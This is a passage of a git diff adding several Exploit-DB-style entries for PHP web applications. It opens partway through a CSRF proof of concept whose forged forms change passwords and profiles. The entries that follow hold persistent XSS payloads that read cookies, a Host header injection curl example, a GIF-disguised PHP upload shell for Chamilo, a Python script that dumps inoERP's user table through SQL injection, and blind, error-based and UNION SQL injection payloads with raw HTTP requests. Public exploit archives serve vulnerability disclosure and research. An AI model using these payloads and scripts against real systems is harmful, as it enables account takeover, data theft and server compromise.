value="MZ">Mozambique</option><option value="NA">Namibia</option><option value="NC">New Caledonia</option><option value="NE">Niger</option><option value="NF">Norfolk Islands</option><option value="NG">Nigeria</option><option value="NI">Nicaragua</option><option value="NL">Netherlands</option><option value="NO">Norway</option><option value="NP">Nepal</option><option value="NR">Nauru</option><option value="NU">Niue</option><option value="NZ">New Zealand</option><option value="OM">Oman</option><option value="PA">Panama</option><option value="PE">Peru</option><option value="PF">French Polynesia</option><option value="PG">Papua New Guinea</option><option value="PH">Philippines</option><option value="PK">Pakistan</option><option value="PL">Poland</option><option value="PM">Saint Pierre and Miquelon</option><option value="PN">Pitcairn</option><option value="PR">Puerto Rico</option><option value="PS">Palestine</option><option value="PT">Portugal</option><option value="PW">Palau</option><option value="PY">Paraguay</option><option value="QA">Qatar</option><option value="RE">Réunion</option><option value="RO">Romania</option><option value="RS">Serbia</option><option value="RU">Russian Federation</option><option value="RW">Rwanda</option><option value="SA">Saudi Arabia</option><option value="SB">Solomon Islands</option><option value="SC">Seychelles</option><option value="SD">Sudan</option><option value="SE">Sweden</option><option value="SG">Singapore</option><option value="SH">Saint Helena</option><option value="SI">Slovenia</option><option value="SJ">Svalbard and Jan Mayen</option><option value="SK">Slovakia</option><option value="SL">Sierra Leone</option><option value="SM">San Marino</option><option value="SN">Senegal</option><option value="SO">Somalia</option><option value="SR">Suriname</option><option value="SS">South Sudan</option><option value="ST">Sao Tome and Pricipe</option><option value="SV">El Salvador</option><option value="SX">Sint Maarten</option><option value="SY">Syrian Arab Republic</option><option value="SZ">Swaziland</option><option value="TC">Turks and Caicos Islands</option><option value="TD">Chad</option><option value="TF">French Southern Terrotories</option><option value="TG">Togo</option><option value="TH">Thailand</option><option value="TJ">Tajikistan</option><option value="TK">Tokelau</option><option value="TL">Timor-Leste</option><option value="TM">Turkmenistan</option><option value="TN">Tunisia</option><option value="TO">Tonga</option><option value="TR">Turkey</option><option value="TT">Trinidad and Tobago</option><option value="TV">Tuvalu</option><option value="TW">Taiwan</option><option value="TZ">Tanzania</option><option value="UA">Ukraine</option><option value="UG">Uganda</option><option value="UM">United States Minor Outlying Islands</option><option value="US">United States</option><option value="UY">Uruguay</option><option value="UZ">Uzbekistan</option><option value="VA">Holy See</option><option value="VC">Venezuela</option><option value="VG">Virgin Islands (GB)</option><option value="VI">Virgin Islands (US)</option><option value="VN">Viet Nam</option><option value="VU">Vanatu</option><option value="WF">Wallis and Futuna</option><option value="WS">Samoa</option><option value="YE">Yemen</option><option value="YT">Mayotte</option><option value="ZA">South Africa</option><option value="ZM">Zambia</option><option value="ZW">Zimbabwe</option></select>
+    <br>
+    <label for="birthday">Birthday</label>
+    <input type="text" name="birthday" id="birthday" value="0000-00-00">
+    <span id="helpBlock" class="help-block">In the format of: YYYY-MM-DD</span>
+    <label for="editor">About You</label><br>
+    <textarea name="about" id="editor" style="min-width: 100%; max-width: 100%; height: 150px;"></textarea>
+    <br>
+    <div class="panel panel-default">
+    <div class="panel-heading">Additional Profile Fields</div>
+    <div class="panel-body"></div>
+    </div>
+    <br>
+    <input type="submit" name="edit" value="Save Changes">
+</form>
+<!-- Edit Profile CSRF End -->
+
+<!-- Edit Signature CSRF -->
+<form id="LAYER_form" action="http://localhost/profile.php/cmd/signature" method="POST" style="padding: 25px;">
+    <label for="sig">Signature</label>
+    <textarea name="sig" id="editor" style="width: 100%; height: 300px; max-width: 100%; min-width: 100%;"></textarea>
+    <br><br>
+    <input type="submit" name="edit" value="Save Changes">
+</form>
+<!-- Edit Signature CSRF End -->
+
+<!-- Change Password CSRF -->
+<form id="LAYER_form" action="http://localhost/profile.php/cmd/password" method="POST" style="padding: 35px;">
+    <label for="current_password">Current Password</label>
+    <input type="password" name="current_password" id="current_password">
+    <label for="new_password">New Password</label>
+    <input type="password" name="new_password" id="new_password">
+    <br><br>
+    <input type="submit" name="edit" value="Save Changes">
+</form>
+<!-- Change Password CSRF End -->
+
+<!-- Forgot Password CSRF -->
+<form action="http://localhost/members.php/cmd/forgotpassword" method="POST" id="LAYER_form" style="padding: 25px;">
+    <label for="email">Email</label>
+    <input type="text" name="email" id="email" class="form-control">
+    <br><br>
+    <input type="submit" name="forget" value="Send Email" class="btn btn-default">
+</form>
+<!-- Forgot Password CSRF End -->
+
+<!-- Reset Password CSRF -->
+<form action="http://localhost/members.php/cmd/resetpassword" method="POST" id="LAYER_form" style="padding: 25px;">
+    <label for="password">Password</label>
+    <input type="password" name="password" id="password" class="form-control">
+    <label for="a_password">Confirm Password</label>
+    <input type="password" name="a_password" id="a_password" class="form-control">
+    <br><br>
+    <input type="submit" name="reset" value="Reset Password" class="btn btn-default">
+</form>
+<!-- Reset Password CSRF End -->
+
+<!-- Register Account CSRF -->
+<form action="http://localhost/members.php/cmd/register" method="POST" style="padding: 25px;">
+    <label for="username">Username</label>
+    <input type="text" name="username" value="" id="username" class="form-control">
+    <label for="password">Password</label>
+    <input type="password" name="password" id="password" class="form-control">
+    <label for="a_password">Confirm Password</label>
+    <input type="password" name="a_password" id="a_password" class="form-control">
+    <label for="email">Email</label>
+    <input type="text" name="email" value="" id="email" class="form-control">
+    <label for="LayerBB_captcha">Are you a bot?</label><br>
+    <img src="http://localhost/public/img/captcha.php" alt="LayerBB Captcha"><br><input type="text" id="LayerBB_captcha" name="LayerBB_captcha">
+    <br><br>
+    <input type="submit" name="register" value="Register" class="btn btn-default">
+    By clicking "Register", you agree to abide by the forum rules located <a href="http://localhost/members.php/cmd/rules">here</a>.
+</form>
+<!-- Register Account CSRF End -->
+
+
+
+3. Solution:
+Update to 1.1.4
\ No newline at end of file
diff --git a/exploits/php/webapps/47419.txt b/exploits/php/webapps/47419.txt
new file mode 100644
index 000000000..900a69721
--- /dev/null
+++ b/exploits/php/webapps/47419.txt
@@ -0,0 +1,41 @@
+# Exploit Title: WP Server Log Viewer 1.0 - 'logfile' Persistent Cross-Site Scripting
+# Date: 2019-09-10
+# Exploit Author: strider
+# Software Link: https://github.com/anttiviljami/wp-server-log-viewer
+# Version: 1.0
+# Tested on: Debian 10 Buster x64 / Kali Linux
+# CVE : None
+
+====================================[Description]====================================
+This plugin allows you to add logfiles via wp-admin. The problem here is that the file paths are stored unfiltered/unescaped. This gives the possibility of a persistent XSS attack.
+
+
+====================================[Codepart]====================================
+
+if( isset( $_GET['action'] ) && 'new' === $_GET['action'] && isset( $_GET['logpath'] ) ) {
+      // new log was added
+      $logs = get_option( 'server_logs' );
+      if( is_null( $logs ) ) {
+        $logs = [];
+      }
+
+      $log = trim( $_GET['logpath'] ); //only trimmed string no escaping
+      $logs[] = $log; //here the log will be added without security checks
+      $logs = array_values( $logs );
+
+      $index = array_search( $log, $logs );
+
+      update_option( 'server_logs', $logs );
+
+      wp_safe_redirect( admin_url('tools.php?page=wp-server-log-viewer&log=' . $index) );
+    }
+
+
+
+====================================[Proof of Concept]====================================
+Add new log file to the plugin.
+paste this exploit into the form and submit it.
+
+<img src=# onerror=alert(document.cookie);>log.txt
+
+It tries to render an image and triggers the onerror event and prints the cookie. in the tab you see the log.txt
\ No newline at end of file
diff --git a/exploits/php/webapps/47422.txt b/exploits/php/webapps/47422.txt
new file mode 100644
index 000000000..f4f2361b4
--- /dev/null
+++ b/exploits/php/webapps/47422.txt
@@ -0,0 +1,83 @@
+# Exploit Title: YzmCMS 5.3 - 'Host' Header Injection
+# Exploit Author: Debashis Pal
+# Vendor Homepage: http://www.yzmcms.com/
+# Source: https://github.com/yzmcms/yzmcms
+# Version: YzmCMS V5.3
+# CVE : N/A
+# Tested on: Windows 7 SP1(64bit),XAMPP: 7.3.9
+
+#About YzmCMS
+==============
+YzmCMS is a lightweight open source content management system that uses OOP (Object Oriented) to develop its own framework.
+
+#Vulnerability 
+===============
+Host Header Injection.
+
+
+#PoC 
+=====
+#YzmCMS V5.3 Access Path: TARGET/yzmcms/
+
+curl http://TARGET/yzmcms/ -H "Host: www.google.com" 
+
+//sample output start
+
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
+<html>
+  <head>
+      <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
+	  <title>YzmCMS - 演示站</title>
+	  <link href="http://www.google.com/yzmcms/common/static/css/default_common.css" rel="stylesheet" type="text/css" />
+	  <link href="http://www.google.com/yzmcms/common/static/css/default_index.css" rel="stylesheet" type="text/css" />
+	  <script type="text/javascript" src="http://www.google.com/yzmcms/common/static/js/jquery-1.8.2.min.js"></script>
+	  <script type="text/javascript" src="http://www.google.com/yzmcms/common/static/js/js.js"></script>
+	  <script type="text/javascript" src="http://www.google.com/yzmcms/common/static/js/koala.min.1.5.js"></script> <!-- 焦点图js -->
+	  <meta name="keywords" content="yzmcms,YzmCMS演示站,yzmcms站点" />
+	  <meta name="description" content="本站是yzmcms演示站点" />
+	  <meta http-equiv="mobile-agent" content="format=xhtml;url=http://TARGET/yzmcms/index.php?m=mobile">
+      <script type="text/javascript">if(window.location.toString().indexOf('pref=padindex') != -1){}else{if(/AppleWebKit.*Mobile/i.test(navigator.userAgent) || (/MIDP|SymbianOS|NOKIA|SAMSUNG|LG|NEC|TCL|Alcatel|BIRD|DBTEL|Dopod|PHILIPS|HAIER|LENOVO|MOT-|Nokia|SonyEricsson|SIE-|Amoi|ZTE/.test(navigator.userAgent))){if(window.location.href.indexOf("?mobile")<0){try{if(/Android|Windows Phone|webOS|iPhone|iPod|BlackBerry/i.test(navigator.userAgent)){window.location.href="http://TARGET/yzmcms/index.php?m=mobile";}else if(/iPad/i.test(navigator.userAgent)){}else{}}catch(e){}}}}</script>
+  </head>
+  <body>
+	   <!--mini登陆条-->
+<div id="head_login">
+<div class="w1000">
+<div id="mini">
+<a href="http://www.google.com/yzmcms/member/index/register.html" target="_blank">注册</a> <a href="http://www.google.com/yzmcms/member/index/login.html"  target="_blank">登录</a>
+</div>
+欢迎光临本站！
+</div>
+</div>
+<!--网站容器-->
+<div id="container">
+<div id="header">
+	<div id="logo">
+	 <a href="http://TARGET/yzmcms/"><img src="http://www.google.com/yzmcms/common/static/images/logo.png" title="YzmCMS - 演示站" alt="YzmCMS - 演示站"></a>
+	</div>
+	<div id="search">
+	<form method="get" action="http://www.google.com/yzmcms/index.php" target="_blank">
+		<div id="searchtxt" class="searchtxt">
+			<div class="searchmenu">	
+			
+
+//sample output End
+
+
+#Solution
+==========
+Don’t trust the host header. Only allow whitelist hostnames. 
+
+
+#Disclosure Timeline
+====================
+Vulnerability Discover Date: 18-Sep-2019
+Vulnerability Notification To vendor via Email: 18-Sep-2019, no responds
+Open issue in github : 22-Sep-2019, no responds
+Submit exploit-db : 25-Sep-2019
+
+
+#Disclaimer
+==========
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information.
+The author prohibits any malicious use of security related information or exploits by the author or elsewhere.
\ No newline at end of file
diff --git a/exploits/php/webapps/47423.txt b/exploits/php/webapps/47423.txt
new file mode 100644
index 000000000..715362da9
--- /dev/null
+++ b/exploits/php/webapps/47423.txt
@@ -0,0 +1,55 @@
+# Exploit Title: Chamillo LMS 1.11.8 - Arbitrary File Upload 
+# Google Dork: "powered by chamilo"
+# Date: 2018-10-05
+# Exploit Author: Sohel Yousef jellyfish security team
+# Software Link: https://chamilo.org/en/download/
+# Version: Chamilo 1.11.8 or lower to 1.8 
+# Category: webapps
+
+# 1. Description
+# Any registered user can upload files and rename and change the file type to 
+# php5 or php7 by ckeditor module in my files section 
+
+# register here :
+# http://localhost/chamilo//main/auth/inscription.php
+# after registration you can view this sections 
+# http://localhost/chamilo/main/social/myfiles.php
+# http://localhost/chamilo/main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0
+# upload your shell in gif format and then rename the format 
+# if the rename function was desabled and add this  GIF89;aGIF89;aGIF89;a   before <?PHP
+# to be like this for examlple
+
+GIF89;aGIF89;aGIF89;a<html>
+ <head>
+  <title>PHP Test</title>
+  <form action="" method="post" enctype="multipart/form-data">
+  <input type="file" name="fileToUpload" id="fileToUpload">
+  <input type="submit" value="upload file" name="submit">
+  </form>
+ </head>
+ <body>
+ <?php echo '<p>FILE UPLOAD</p><br>';
+ $tgt_dir = "uploads/";
+ $tgt_file = $tgt_dir.basename($_FILES['fileToUpload']['name']);
+ echo "<br>TARGET FILE= ".$tgt_file;
+ //$filename = $_FILES['fileToUpload']['name'];
+ echo "<br>FILE NAME FROM VARIABLE:- ".$_FILES["fileToUpload"]["name"];
+ if(isset($_POST['submit']))
+ {
+ if(file_exists("uploads/".$_FILES["fileToUpload"]["name"]))
+    { echo "<br>file exists, try with another name"; }
+ else   {
+         echo "<br>STARTING UPLOAD PROCESS<br>";
+        if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"],
+$tgt_file))
+        { echo "<br>File UPLOADED:- ".$tgt_file; }
+
+          else  { echo "<br>ERROR WHILE UPLOADING FILE<br>"; }
+    }
+ }
+?>
+ </body>
+</html>
+
+# and uplaod it as php.gif
+# you can browse the files form right click and click on browse option
\ No newline at end of file
diff --git a/exploits/php/webapps/47424.txt b/exploits/php/webapps/47424.txt
new file mode 100644
index 000000000..a4c6ad519
--- /dev/null
+++ b/exploits/php/webapps/47424.txt
@@ -0,0 +1,48 @@
+# Exploit Title: Duplicate-Post 3.2.3 - Persistent Cross-Site Scripting
+# Google Dork: N/A
+# Date: 2019-06-11
+# Exploit Author: Unk9vvN
+# Vendor Homepage: https://duplicate-post.lopo.it/
+# Software Link: https://wordpress.org/plugins/duplicate-post/
+# Version: 3.2.3
+# Tested on: Kali Linux
+# CVE: N/A
+
+# Description
+# This vulnerability is in the validation mode and is located in the plugin management panel and the vulnerability type is stored . the vulnerability parameters are as follows.
+
+1.Go to the 'Settings' section
+2.Enter the payload in the "Title prefix", "Title suffix", "Increase menu order by", "Do not copy these fields" sections
+3.Click the "Save Changes" option
+4.Your payload will run
+
+# URI: http://localhost/wp-admin/options-general.php?page=duplicatepost
+# Parameter & Payoad: 
+
+duplicate_post_title_prefix="><script>alert(1)</script>
+duplicate_post_title_suffix="><script>alert(1)</script>
+duplicate_post_increase_menu_order_by="><script>alert(1)</script>
+duplicate_post_blacklist="><script>alert(1)</script>
+
+
+#
+# PoC
+#
+POST /wp-admin/options.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/wp-admin/options-general.php?page=duplicatepost
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 981
+Connection: close
+Upgrade-Insecure-Requests: 1
+DNT: 1
+
+option_page=duplicate_post_group&action=update&_wpnonce=0e8a49a372&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dduplicatepost%26settings-updated%3Dtrue&duplicate_post_copytitle=1&duplicate_post_copyexcerpt=1&duplicate_post_copycontent=1&duplicate_post_copythumbnail=1&duplicate_post_copytemplate=1&duplicate_post_copyformat=1&duplicate_post_copymenuorder=1&duplicate_post_title_prefix=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&duplicate_post_title_suffix=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&duplicate_post_increase_menu_order_by=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&duplicate_post_blacklist=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&duplicate_post_roles%5B%5D=administrator&duplicate_post_roles%5B%5D=editor&duplicate_post_types_enabled%5B%5D=post&duplicate_post_types_enabled%5B%5D=page&duplicate_post_show_row=1&duplicate_post_show_submitbox=1&duplicate_post_show_adminbar=1&duplicate_post_show_bulkactions=1&duplicate_post_show_notice=1
+
+
+# Discovered by:
+https://t.me/Unk9vvN
\ No newline at end of file
diff --git a/exploits/php/webapps/47425.txt b/exploits/php/webapps/47425.txt
new file mode 100644
index 000000000..6c7c0c41b
--- /dev/null
+++ b/exploits/php/webapps/47425.txt
@@ -0,0 +1,56 @@
+# Exploit Title: all-in-one-seo-pack 3.2.7 - Persistent Cross-Site Scripting
+# Google Dork: inurl:"\wp-content\plugins\all-in-one-seo-pack"
+# Date: 2019-06-13
+# Exploit Author: Unk9vvN
+# Vendor Homepage: https://semperplugins.com/all-in-one-seo-pack-pro-version
+# Software Link: https://wordpress.org/plugins/all-in-one-seo-pack/
+# Version: 3.2.7
+# Tested on: Windows 10
+# CVE: N/A
+
+# Description
+# This vulnerability is in the validation mode and is located in  the all-in-one-seo-pack tab inside the  and the vulnerability type is stored . the vulnerability parameters are as follows.
+
+1.Go to the 'all-in-one-seo-pack' tab
+2.Select 'general settings' section 
+3.Enter the payload in "Additional Front Page Headers","Additional Posts Page Headers" section
+4.Click the "Update Options" option
+4.Your payload will run on visit page
+
+
+# URI: http://localhost/wordpress/wp-admin/admin.php?page=all-in-one-seo-pack
+# Payload: "><script>alert(1)</script>
+
+#
+# PoC
+#
+POST /wordpress/wp-admin/admin.php?page=all-in-one-seo-pack%2Faioseop_class.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/wordpress/wp-admin/admin.php?page=all-in-one-seo-pack%2Faioseop_class.php
+Content-Type: multipart/form-data; boundary=---------------------------24442753012045
+Content-Length: 8625
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+-----------------------------24442753012045
+Content-Disposition: form-data; name="aiosp_front_meta_tags"
+
+"><script>alert(1)</script>
+-----------------------------24442753012045
+Content-Disposition: form-data; name="aiosp_home_meta_tags"
+
+"><script>alert(1)</script>
+-----------------------------24442753012045
+
+Content-Disposition: form-data; name="Submit"
+
+Update Options »
+-----------------------------24442753012045--
+
+
+# Discovered by:
+https://unk9vvn.com
\ No newline at end of file
diff --git a/exploits/php/webapps/47426.txt b/exploits/php/webapps/47426.txt
new file mode 100644
index 000000000..8a0a9e3bc
--- /dev/null
+++ b/exploits/php/webapps/47426.txt
@@ -0,0 +1,47 @@
+# Exploit Title: inoERP 4.15 - 'download' SQL Injection
+# Date: 2019-09-13
+# Exploit Author: Semen Alexandrovich Lyhin
+# Vendor Homepage: http://inoideas.org/
+# Version: 4.15
+# CVE: N/A
+
+# A malicious query can be sent in base64 encoding to unserialize() function.
+# It can be deserialized without any sanitization then.
+# After it, it gets passed directly to the SQL query.
+
+
+#!/bin/python
+
+import os
+import base64
+import requests
+import sys
+
+def generatePayload(query):
+    #THIS FUNCTION IS INSECURE BY DESIGN
+    b64_query = base64.b64encode(query);
+    return os.popen("php -r \"echo base64_encode(serialize(base64_decode('" + b64_query + "')));\"").read()
+    
+
+def ExecSQL(query):
+    data = {"data":query,
+            "data_type":"sql_query"}
+         
+    r = requests.post("http://" + ip + "/download.php", data=data)
+    return r.content
+
+
+if __name__ == "__main__":
+    
+    if len(sys.argv) != 3:
+        print '(+) usage: %s <target> ' % sys.argv[0]
+        print '(+) eg: %s 127.0.0.1 "ierp/" ' % sys.argv[0]
+        exit()
+    
+    ip = sys.argv[1] + "/" + sys.argv[2]
+    
+    #if don't have php, set Payload to the next one to check this SQLi via "select @@version;" payload: czoxNzoic2VsZWN0IEBAdmVyc2lvbjsiOw== 
+    
+    data = r"select * from ino_user;"
+    
+    print ExecSQL(generatePayload(data));
\ No newline at end of file
diff --git a/exploits/php/webapps/47427.txt b/exploits/php/webapps/47427.txt
new file mode 100644
index 000000000..135100c32
--- /dev/null
+++ b/exploits/php/webapps/47427.txt
@@ -0,0 +1,34 @@
+# Exploit Title: citecodecrashers Pic-A-Point 1.1 - 'Consignment' SQL Injection
+# Author: Cakes
+# Discovery Date: 2019-09-26
+# Vendor Homepage: https://github.com/citecodecrashers/Pic-A-Point
+# Software Link: https://github.com/citecodecrashers/Pic-A-Point/archive/master.zip
+# Tested Version: 1.1
+# Tested on OS: CentOS 7
+# CVE: N/A
+
+# Discription:
+# Simple SQL injection after application authentication. 
+
+# POST Request
+
+# Parameter: Consignment (POST)
+# Type: boolean-based blind
+# Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
+
+Payload: Consignment=1234' AND 9752=(SELECT (CASE WHEN (9752=9752) THEN 9752 ELSE (SELECT 1018 UNION SELECT 3533) END))-- QBEy&Submit=Trace now
+
+# Type: error-based
+# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+
+Payload: Consignment=1234' AND (SELECT 4396 FROM(SELECT COUNT(*),CONCAT(0x7162707871,(SELECT (ELT(4396=4396,1))),0x716a7a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- hufy&Submit=Trace now
+
+# Type: time-based blind
+# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+
+Payload: Consignment=1234' AND (SELECT 9267 FROM (SELECT(SLEEP(5)))qpkL)-- OiWK&Submit=Trace now
+
+# Type: UNION query
+# Title: Generic UNION query (NULL) - 20 columns
+
+Payload: Consignment=1234' UNION ALL SELECT NULL,CONCAT(0x7162707871,0x614b666177515872456a7177706f6b654d54744e75644e4b597648496742464c6346656865654e67,0x716a7a7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- cUud&Submit=Trace now
\ No newline at end of file
diff --git a/exploits/php/webapps/47428.txt b/exploits/php/webapps/47428.txt
new file mode 100644
index 000000000..9bd9b8fa1
--- /dev/null
+++ b/exploits/php/webapps/47428.txt
@@ -0,0 +1,43 @@
+# Exploit Title: InoERP 0.7.2 - Persistent Cross-Site Scripting
+# Google Dork: None
+# Date: 2019-09-14
+# Exploit Author: strider
+# Vendor: http://inoideas.org/
+# Software Link: https://github.com/inoerp/inoERP
+# Version: 0.7.2
+# Tested on: Debian 10 Buster x64 / Kali Linux
+# CVE : None
+
+====================================[Description]====================================
+There is a security flaw on the comment section, which allows to make persistant xss without any authentication.
+An attacker could use this flaw to gain cookies to get into a account of registered users.
+
+
+====================================[Vulnerability]====================================
+extensions/comment/post_comment.php in the server part
+$$extension = new $extension;
+
+ foreach ($field_array as $key => $value) {
+	if (!empty($_POST[$value])) {
+	 $$extension->$value = trim(mysql_prep($_POST[$value])); <-- escaping for htmlentities
+	} else {
+	 $$extension->$value = "";
+	}
+ }
+
+includes/functions/functions.inc in the server part
+function mysql_prep($value) {
+ return $value; <-- just returns the value
+}
+
+====================================[Proof of Concept]====================================
+Step 1:
+http://your-server-ip/content.php?mode=9&content_type=forum&category_id=7
+
+Step 2:
+open a new question and submit it.
+
+Step 3:
+then paste this PoC-Code below into the comment field and submit that
+
+<img src=# onerror="alert(document.cookie);">
\ No newline at end of file
diff --git a/exploits/php/webapps/47430.txt b/exploits/php/webapps/47430.txt
new file mode 100644
index 000000000..0364a4c48
--- /dev/null
+++ b/exploits/php/webapps/47430.txt
@@ -0,0 +1,45 @@
+# Exploit Title: thesystem 1.0 - 'server_name' SQL Injection 
+# Author: Sadik Cetin 
+# Discovery Date: 2019-09-26 
+# Vendor Homepage: https://github.com/kostasmitroglou/thesystem 
+# Software Link: https://github.com/kostasmitroglou/thesystem 
+# Tested Version: 1.0 
+# Tested on OS: Windows 10 
+# CVE: N/A 
+
+# Description: 
+# Simple SQL injection after login bypass(login_required didn't used) 
+
+POST /data/ HTTP/1.1 
+Host: 127.0.0.1:8000 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0 
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 
+Accept-Encoding: gzip, deflate 
+Content-Type: multipart/form-data; boundary=---------------------------18467633426500 
+Content-Length: 330 
+Connection: close 
+Referer: http://127.0.0.1:8000/data/ 
+Cookie: csrftoken=Mss47G2ILybbQoFYXpVPlWNaUzGQ5yKoXGRPucrKIG4gz5X9TVEPQJtItbqN9SM6; _ga=GA1.4.567905900.1569231977 
+Upgrade-Insecure-Requests: 1 
+
+-----------------------------18467633426500 
+Content-Disposition: form-data; name="csrfmiddlewaretoken" 
+
+9LsPWlffpiAEGYeCvR9Bead9tslR18flkZRAjREhmqtJpFwNrnSBJXTH245O5sh3 
+-----------------------------18467633426500 
+Content-Disposition: form-data; name="server_name" 
+
+' or '1=1 
+-----------------------------18467633426500-- 
+
+
+
+HTTP/1.1 200 OK 
+Date: Thu, 26 Sep 2019 12:16:11 GMT 
+Server: WSGIServer/0.2 CPython/3.5.3 
+Content-Type: text/html; charset=utf-8 
+X-Frame-Options: SAMEORIGIN 
+Content-Length: 190 
+
+(23, 'test', '192.168.1.4', '22', 'test@test', 'root', '1234', 'test', 'test', '2019-09-26')(24, '<h1>Unix', '192.168.1.5', '22', 'test@test', 'root', '1234', 'test2', 'test2', '2019-09-26')
\ No newline at end of file
diff --git a/exploits/php/webapps/47431.txt b/exploits/php/webapps/47431.txt
new file mode 100644
index 000000000..7d105eab5
--- /dev/null
+++ b/exploits/php/webapps/47431.txt
@@ -0,0 +1,60 @@
+# Exploit Title: thesystem App 1.0 - Persistent Cross-Site Scripting
+# Author: İsmail Güngör 
+# Discovery Date: 2019-09-26 
+# Vendor Homepage: https://github.com/kostasmitroglou/thesystem 
+# Software Link: https://github.com/kostasmitroglou/thesystem 
+# Tested Version: 1.0 
+# Tested on OS: Windows 10 
+# CVE: N/A 
+
+# Description: 
+# Stored XSS after login bypass(login_required didn't used) 
+
+First of all following request is sent web server 
+
+POST /data/ HTTP/1.1 
+Host: 127.0.0.1:8000 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0 
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 
+Accept-Encoding: gzip, deflate 
+Content-Type: multipart/form-data; boundary=---------------------------191691572411478 
+Content-Length: 332 
+Connection: close 
+Referer: http://127.0.0.1:8000/data/ 
+Cookie: csrftoken=Mss47G2ILybbQoFYXpVPlWNaUzGQ5yKoXGRPucrKIG4gz5X9TVEPQJtItbqN9SM6; _ga=GA1.4.567905900.1569231977 
+Upgrade-Insecure-Requests: 1 
+
+-----------------------------191691572411478 
+Content-Disposition: form-data; name="csrfmiddlewaretoken" 
+
+0sryZfN7NDe4UUwhjehPQxPRtaMSq85nbGQjmLc9KL79DBOsfK0Plkvp2MwPus75 
+-----------------------------191691572411478 
+Content-Disposition: form-data; name="server_name" 
+
+<h1>test 
+-----------------------------191691572411478-- 
+
+After following request is sent web server 
+
+GET /show_search/ HTTP/1.1 
+Host: 127.0.0.1:8000 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0 
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 
+Accept-Encoding: gzip, deflate 
+Connection: close 
+Referer: http://127.0.0.1:8000/data/ 
+Cookie: csrftoken=Mss47G2ILybbQoFYXpVPlWNaUzGQ5yKoXGRPucrKIG4gz5X9TVEPQJtItbqN9SM6; _ga=GA1.4.567905900.1569231977 
+Upgrade-Insecure-Requests: 1 
+
+# Finally, response is shown Xtored XSS: 
+
+HTTP/1.1 200 OK 
+Date: Thu, 26 Sep 2019 12:25:19 GMT 
+Server: WSGIServer/0.2 CPython/3.5.3 
+Content-Type: text/html; charset=utf-8 
+X-Frame-Options: SAMEORIGIN 
+Content-Length: 176 
+
+('2019-09-26 14:25:01.878572', '1')('2019-09-26 15:16:11.013642', '1')('2019-09-26 15:21:52.962785', '<h1>test')('2019-09-26 15:23:50.367709', '<script>alert("kale")</script>')
\ No newline at end of file
diff --git a/exploits/php/webapps/47432.txt b/exploits/php/webapps/47432.txt
new file mode 100644
index 000000000..9e6e54aa2
--- /dev/null
+++ b/exploits/php/webapps/47432.txt
@@ -0,0 +1,38 @@
+# Exploit Title: thesystem App 1.0 - 'username' SQL Injection
+# Author: Anıl Baran Yelken 
+# Discovery Date: 2019-09-26 
+# Vendor Homepage: https://github.com/kostasmitroglou/thesystem 
+# Software Link: https://github.com/kostasmitroglou/thesystem 
+# Tested Version: 1.0 
+# Tested on OS: Windows 10 
+# CVE: N/A 
+# Description: 
+# Simple SQL injection after login bypass(login_required didn't used) 
+
+POST /check_users/ HTTP/1.1 
+Host: 127.0.0.1:8000 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0 
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 
+Accept-Encoding: gzip, deflate 
+Content-Type: multipart/form-data; boundary=---------------------------54363239114604 
+Content-Length: 327 
+Connection: close 
+Referer: http://127.0.0.1:8000/check_users/ 
+Cookie: csrftoken=Mss47G2ILybbQoFYXpVPlWNaUzGQ5yKoXGRPucrKIG4gz5X9TVEPQJtItbqN9SM6; _ga=GA1.4.567905900.1569231977 
+Upgrade-Insecure-Requests: 1 
+-----------------------------54363239114604 
